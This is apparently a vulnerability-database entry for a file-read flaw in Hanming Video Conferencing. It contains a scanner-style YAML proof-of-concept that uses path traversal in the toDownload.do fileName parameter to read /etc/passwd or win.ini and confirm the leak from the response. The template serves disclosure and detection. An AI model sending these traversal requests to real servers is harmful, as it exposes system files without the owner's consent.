漏洞描述
Hanming Video Conferencing is vulnerable to a file read vulnerability.
hanming-video-conferencing-file-read: Hanming Video Conferencing File Read
PoC代码[已公开]
id: hanming-video-conferencing-file-read
info:
name: Hanming Video Conferencing File Read
author: kzaopa
severity: high
description: |-
Hanming Video Conferencing is vulnerable to a file read vulnerability.
tags: hanming,file-read
created: 2023/09/02
rules:
linux0:
request:
method: GET
path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
windows0:
request:
method: GET
path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
expression: windows0() || linux0()